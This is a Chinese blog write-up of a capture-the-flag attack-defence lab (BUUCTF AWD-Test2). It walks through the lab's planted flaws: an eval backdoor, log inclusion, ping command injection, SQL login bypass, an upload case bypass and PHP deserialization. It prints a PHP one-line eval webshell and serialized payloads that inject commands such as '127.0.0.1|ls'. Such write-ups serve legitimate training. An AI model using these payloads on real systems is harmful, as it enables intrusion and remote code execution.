AWD-Test2

最新推荐文章于 2024-02-29 20:35:28 发布
最新推荐文章于 2024-02-29 20:35:28 发布
阅读量2.7k 收藏 6
点赞数
分类专栏: BUUCTF 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124025661
版权

00x1-eval后门

先用D盾扫一波
在这里插入图片描述
在这里插入图片描述

00x2-日志包含

原理:
`log1.php``会把我们的请求以及其他的一些信息写进根目录下的log.php中。
然后我们进入log.php时,就会解析我们的shell了。
也就是有POST或者GET传参的地方,就能getshell
在这里插入图片描述

在这里插入图片描述
在任意位置添加一句话马,然后在/log.php,getshell
在这里插入图片描述
或者…
在这里插入图片描述

00x3-ping

在user.php中的ping,可以用管道来getflag
在这里插入图片描述
在这里插入图片描述
漏洞引发顺序:
index.php中的$c值在function.php中代表了文件名
在这里插入图片描述
function.php
在这里插入图片描述
然后index.php中的run_a($obj,$a);在function.php运行了在$obj中的方法,$a代表方法名
最后由user类中的ping方法引起了漏洞
在这里插入图片描述

00x4-万能密码

在登录页面万能密码
在这里插入图片描述
sql语句为(在user.login中)
在这里插入图片描述

00x5-文件上传

没有过滤大小写,可以传一个含一句话马的shell,例如a.phP
在这里插入图片描述

00x6-反序列化

第一处:cacf.php可以直接把马写入log.php

<?php
class chybeta{
    var $test;
}
$class4 = new chybeta();
$class4->test = '<?php @eval($_POST[1]);?>';
$class4_ser = serialize($class4);
echo $class4_ser;
?>

第二处home.php
原理:method是方法,args是参数
在这里插入图片描述

<?php

class home{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        
      
        $this->method = $method;
        $this->args = $args;
    }   
}
$a=new home("ping",array("127.0.0.1|ls"));
echo base64_encode(serialize($a));
?>
succ3
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF全题解目录(一)
qq_42812036的博客
02-13 3354
web [HCTF 2018]WarmUp 全解:https://www.jianshu.com/p/1c2998973197 PHP 代码审计 phpmyadmin 4.8.1任意文件包含 [强网杯 2019]随便注 比赛web题全解:https://www.jianshu.com/p/db6e2576b674 fuzz一下,过滤规则得出,然后 show tables =>得表名 show...
awd-watchbird:适用于AWD的功能强大PHP WAF
03-19
(但请注意规则是否允许第三方通防)守望者版本1.4适用于AWD的功能强大PHP WAF功能:易于配置(单文件,无需加载外部js / css)可以随时开启/关闭某项防御基本防御:数据库注入(SQL注入)文件上传(上传)文件包含...
awd-platform(AWD攻防平台)
03-16
# AWD线下环境启动说明 by Hence Zhang @Lancet github上的项目,搬运了一下
BUUCTF~Misc~Test2
m0_47643893的博客
02-02 992
目录FLAG隐藏的钥匙假如给我三天光明最简单的misc-y1ngA_Beautiful_Picture神秘的龙卷风小姐姐-y1ng后门查杀荷兰宽带数据泄露来首歌吧数据包中的线索九连环面具下的flagwebshell后门被劫持的神秘礼物刷新过的图片Snake圣火昭昭-y1ng梅花香之苦寒来菜刀666总结 FLAG 在Stegsolve中发现有zip文件,导出之后发现压缩包文件损坏,我们用winrar修复文件,然和就可以解压了,看到是elf文件可能是逆向就用IDA打开然后就看到了flag flag{dd0gf4
BUUCTF AWD-Test1
最新发布
qq_60905276的博客
02-29 480
在ThinkPHP框架中,这会被解释为对视图进行显示的操作。content是包含php代码的字符串,其中是执行的恶意代码。看到ThinkPHP,思路瞬间清晰,老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc。防止有些新朋友不明白POC怎么来的,简短介绍一下。这poc的意思是在URL中发送了一个参数。打开靶场是这个有些简陋的界面。成功打开phpinfo界面。随便点点,找到这个东西。找到flag了,抓取。
BUUCTF逆向题练习记录(wp) --(4)(偷懒三题
Air_cat的博客
09-18 459
[GKCTF2020]BabyDriver 简单win驱动。 拖ida仔细分析即可。 注意寻找关键函数。 [FlareOn6]Overlong 这题个人认为非常有意思 考察的点在于①发现数组长度远大于给的长度参数0x1c②通过动调直接得出结果。 这一题还给了一个附件,提示运用正确的方法进行解密可以很快得到flag,而我们知道,ctf的re题中,最快的解密往往就是动调一把梭。 需要大胆猜想,大胆尝试。 [WUSTCTF2020]Cr0ssfun 额,无脑拼接嗷 ...
【linux】03 shell
weixin_42638946的博客
09-03 220
03 shell 参考自:Linux基础课。 3.1 概论 概论 shell是我们通过命令行与操作系统沟通的语言。 shell脚本可以直接在命令行中执行,也可以将一套逻辑组织成一个文件,方便复用。AC Terminal中的命令行可以看成是一个“shell脚本在逐行执行”。 Linux中常见的shell脚本有很多种,常见的有: Bourne Shell(/usr/bin/sh或/bin/sh) Bourne Again Shell(/bin/bash) C Shell(/usr/bin/cs
Linux查找文件或目录 find及结合xargs应用
helloxiaozhe的博客
02-24 3993
    find 命令主要作用是沿着文件层次结构向下遍历,匹配符合条件的文件,并执行相应的操作。Linux 下 find 命令提供了相当多的查找条件,功能很强大,如果能结合xargs等管道命令使得,更是强大无比。下面将从三个方面介绍: (1)find命令介绍及示例  (2)xargs命令介绍及示例 (3)、xargs结合find使用 闲话少絮,正文开始: (1)find命令介绍及示例 fi...
buuctf-AWD-测试1
m0_62008601的博客
08-03 2081
thinkphp漏洞复现/ssh远程登录
PHP面向对象笔记
pingxlz的专栏
07-20 462
我们先建立一个基础的类。<br />       PHP中使用关键字 class 来定义一个类。类的命名一般使用首字符大写,而后每个单词首字符大写连接的方式方便阅读。<br /> <br />   2. 属性:用来描述对象的数据元素称为对象的属性(也称为数据/状态)<br /> <br />   3. 在PHP5中,属性指在class 中声明的变量。在声明变量时,必须使用public private protected 之一进行修饰,定义变量的访问权限。<br />         Public(公开):
【2020安洵杯线下赛】AWD的第一道pwn题
古月浪子的博客
12-18 2332
题目是一个简易代码执行器 按照以前的此类题型的经验试了一下,通过指针任意读写的方法好像用不了(不知道是不是我菜了-_- 可以看到一个ev函数,我们在sub_21B4函数中找到它的实现 可以发现我们能echo4个字符,如果让拼接的字符串变成echo 0;sh即可拿到shell 写脚本打全场: #!/usr/bin/python3 from pwn import * from LibcSearcher import * import requests def submit_flag(flag):
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
CTF-AWD-WEB AWD 模式下的WEB试题仓库 上传一些参加过的CTF线下赛AWD模式的WEB试题等
awd-platform-master.zip
09-07
github上下载太慢了,特意搭飞机下回来给需要的人。项目大小是429.03M,下载了整整一个小时,项目是以docker的形式安装的,安装手册网上一大堆。
matlab加密代码-ac-awd-test:撰写论文时由Ardya编写的AC,SAC和AWD测试的C源代码
05-27
AWD- > AWD测试的源代码 RC5- > RC5算法“成对”和“差异”计算的源代码 TEA- >用于计算TEA算法的“对”和“差”的源代码 CFN- > CFN算法“成对”和“差异”计算的源代码 VEA- >用于计算VEA算法的“对”和“差”的源...
Linux基础(三) shell
May the Force be with you
09-05 732
Linux基础(三) shell 1.概论 shell是我们通过命令行与操作系统沟通的语言。 shell脚本可以直接在命令行中执行,也可以将一套逻辑组织成一个文件,方便复用。 AC Terminal中的命令行可以看成是一个“shell脚本在逐行执行”。 Linux中常见的shell脚本有很多种,常见的有: Bourne Shell(/usr/bin/sh或/bin/sh) Bourne Again Shell(/bin/bash) C Shell(/usr/bin/csh) K Shell(/usr/bin
命令-cd
weixin_33889665的博客
03-05 54
cd 命令 cd-Change the shell working directory. 改变当前shell工作目录【SYNOPSIS】cd [/PATH/TO/SOMEDIR]【OPTIONS】cd /:进入系统根目录;cd ~或cd:表示回到当前用户的家目录;cd .:表示当前目录cd ..:表示退回到当前目录的上一级目录;cd ../../:表示逐级退回...
一个awd训练平台
qq_44657899的博客
10-26 9730
前言 如果是第一次打awd,那么使用这个平台是非常好的选择,下面我将我使用这个平台的过程和踩得坑一一列举,希望对其他awd新手有所帮助。 介绍这个平台的博客很多,我感觉这位师傅写的比较好,我刚开始就是看的这些博客学习如何使用: AWD线下攻防平台搭建 AWD线下攻防环境使用 文章目录前言0x01 环境配置-安装docker0x02 环境配置-配置加速服务器0x03 平台搭建0x04 平台使用0x05 一些小问题 0x01 环境配置-安装docker 我安装docker都是按下面这篇文章来的,一个命令一个命令
【无标题】11111111
cpongo011702
09-14 143
有序引用嵌套引用awd awa引用引用1引用1 引用1嵌套引用嵌套引用1嵌套引用1代码块adaawf多行代码块儿//链接。
bugku s2 awd排位赛-9
12-07
bugku s2 awd排位赛-9是什么游戏名称的比赛呢?如果是bugku s2 awd排位赛-9这个比赛的名称,可以具体描述一下这个比赛的情况和内容吗?比如比赛的规则、参与者、赛程安排等等。这样我才能更好地回答你关于这个比赛的问题。 如果bugku s2 awd排位赛-9是某个游戏或竞赛的名称,我需要更多的信息才能准确地回答你的问题。比如是在哪个游戏平台上进行的比赛?参与者的胜负情况如何?有没有一些特殊的规则或要求?只有了解了这些信息,我才能为你提供确切的回答。 希望你能提供更多的细节,这样我才能帮助你更好地回答有关bugku s2 awd排位赛-9的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值